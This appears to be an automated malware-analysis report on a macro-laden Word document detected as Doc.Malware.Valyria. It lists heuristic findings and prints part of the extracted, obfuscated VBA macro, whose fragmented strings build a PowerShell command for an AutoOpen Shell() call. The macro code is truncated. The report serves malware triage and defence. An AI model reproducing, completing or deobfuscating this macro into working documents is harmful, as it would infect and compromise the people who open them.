Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic); T1204.002 (User Execution: Malicious File)
The sample is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function, so the macro runs as soon as the document is opened with macros enabled. The macro uses a Shell() call, indicating an attempt to execute external commands. It assembles its command line from many short string fragments (for example `"Hel" + "l " + Chr(34) + "$("` in the extracted source), a common obfuscation that keeps the full command string out of the visible macro text; the result appears to be a command or identifier, suggesting the document is the first stage of a downloader or execution chain.
Heuristics (7)

- ClamAV: Doc.Malware.Valyria-6707484-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Valyria-6707484-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code.
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28815 bytes | 3a4819303191d2c3e7260865ad9cca6e82c45c73609164aa0acd7c50d9be0f74 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "PAYfwiOjsjMi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "FNawurQ"
Function RdmprBqkUjf()
On Error Resume Next
hhjRmz = (vQOzOC * 68574 + 90221 * CInt(OYQWa - CDbl(69122)) * 63533 * Oct(9509))
MHdHaoFVF = "Hel" + "l " + Chr(34) + "$(" + "SET" + "-IT"
skvjzC = (nQakA * 19509 + 15751 * CInt(GKLMww - CDbl(91466)) * 46137 * Oct(17397))
DDMvpbkCIBE = "Em " + " 'v" + "ar"
UJXXC = (AijtMz * 24136 + 35983 * CInt(iblIK - CDbl(49519)) * 9216 * Oct(32080))
njvdwudrNz = "Iab" + "lE:" + "OFS"
RdmprBqkUjf = MHdHaoFVF + DDMvpbkCIBE + njvdwudrNz
QQYUG = (zMmWds * 88690 + 30056 * CInt(cjVdO - CDbl(74614)) * 13568 * Oct(95462))
End Function
Function jFJLIjp()
On Error Resume Next
zQVKPw = (PsGGma * 62362 + 45897 * CInt(wAMppU - CDbl(77022)) * 22255 * Oct(44645))
HnpakwbLD = "' " + "'' " + ") " + Chr(34)
aDbCdJ = (iUqTm * 94868 + 77165 * CInt(NznIcC - CDbl(6576)) * 95990 * Oct(73081))
BYZcCDPMpM = "+[" + "stR" + "iNG" + "](" + " '6"
muHEf = (JmjXjo * 82198 + 55995 * CInt(TvMhYJ - CDbl(5905)) * 46794 * Oct(12484))
brAUOLm = "2-" + "88&" + "10" + "4h7" + "2A1"
UACvdX = (pjrOL * 51499 + 78165 * CInt(JzNQA - CDbl(49110)) * 17403 * Oct(19781))
HnXJiQCw = "10" + "h66" + "h10"
IHrQN = (jWBcK * 53144 + 12909 * CInt(GAdzGl - CDbl(66293)) * 15311 * Oct(39361))
HmiEnrs = "9y5" + "8h" + "39%" + "58h" + "116" + "d12" + "7i"
TOJpI = (BLqrm * 41205 + 61721 * CInt(baHsKw - CDbl(57179)) * 73426 * Oct(6175))
KjEJHbqoLZi = "109" + "i5" + "5y" + "117" + "%1"
HPXaC = (cAnTw * 99308 + 98723 * CInt(OvbzlP - CDbl(10711)) * 71014 * Oct(39403))
oiulwnQ = "20" + "y1" + "12h" + "127" + "-12" + "1d" + "110"
jFJLIjp = HnpakwbLD + BYZcCDPMpM + brAUOLm + HnXJiQCw + HmiEnrs + KjEJHbqoLZi + oiulwnQ
YjipzW = (hLBhsi * 52916 + 18273 * CInt(OliMt - CDbl(53065)) * 53115 * Oct(26257))
End Function
Function pBTFRQbUt()
On Error Resume Next
OWiAoC = (vkCWu * 74937 + 5825 * CInt(ZOozM - CDbl(42058)) * 23734 * Oct(99096))
HSzWpLIkulL = "%5" + "8A1" + "04" + "i1"
TAUCHt = (EQLizP * 63182 + 43866 * CInt(KzwZnX - CDbl(53839)) * 66020 * Oct(33855))
IwHiDid = "23W" + "116" + "-1" + "26y" + "117" + "A1"
fmdAIC = (ohoiU * 75490 + 82262 * CInt(RdbUR - CDbl(19651)) * 64573 * Oct(34269))
CJaMqjGhUV = "19T" + "33i" + "62" + "%1" + "14-" + "10" + "9d1"
BYNaCv = (llVOJ * 51479 + 29715 * CInt(jcazi - CDbl(31621)) * 82289 * Oct(19004))
OHcHzvQHSBA = "05" + "h1" + "06W" + "10" + "8A" + "58d"
TVtAO = (czViz * 68988 + 78534 * CInt(mmQwjS - CDbl(55024)) * 92377 * Oct(82476))
zJzTRPJUfl = "39" + "W5" + "8&" + "11"
pBTFRQbUt = HSzWpLIkulL + IwHiDid + CJaMqjGhUV + OHcHzvQHSBA + zJzTRPJUfl
Ynpji = (iLOGGj * 3613 + 45609 * CInt(ksQow - CDbl(31524)) * 36202 * Oct(83474))
End Function
Function tOiiRvjwCsW()
On Error Resume Next
oNSTHr = (XifbaL * 87172 + 29475 * CInt(vnVirF - CDbl(69561)) * 85390 * Oct(47668))
mjjIasStJYU = "6i1" + "27" + "i10" + "9W5" + "5y"
ZMHuwG = (KuVQOD * 44431 + 51799 * CInt(BWwzZz - CDbl(2208)) * 4668 * Oct(1247))
ltbrLDhldAF = "11" + "7-" + "12"
zInjca = (JSSQkh * 40808 + 57379 * CInt(wuVjk - CDbl(95990)) * 15070 * Oct(16528))
tbicnWd = "0-" + "11" + "2A" + "12"
NwbYa = (FtVIn * 43973 + 21705 * CInt(qTtEHS - CDbl(33388)) * 79828 * Oct(52182))
KDaUVGwt = "7-1" + "21A" + "110" + "d58" + "i7"
YAHhT = (zAffPi * 38020 + 70217 * CInt(HKqLMp - CDbl(57386)) * 76027 * Oct(3644))
wukLcNA = "3&" + "99d" + "10" + "5&1"
tOiiRvjwCsW = mjjIasStJYU + ltbrLDhldAF + tbicnWd + KDaUVGwt + wukLcNA
Nqszqm = (UHAaD * 46383 + 50331 * CInt(InrfcM - CDbl(99664)) * 18030 * Oct(25510))
End Function
Function jCIVz()
On Error Resume Next
HaiOdu = (FCGAG * 1758 + 78372 * CInt(rJLkRE - CDbl(74681)) * 31276 * Oct(64489))
OsSLJEjIdM = "10" + "y12" + "7%" + "11" + "9T" + "52T"
CmHZS = (hfziL * 88387 + 12819 * CInt(FNwVTc - CDbl(2906)) * 73316 * Oct(5915))
MzXEu = "84" + "d1" + "27" + "A1"
lDnZvv = (KwJaI *
... (truncated)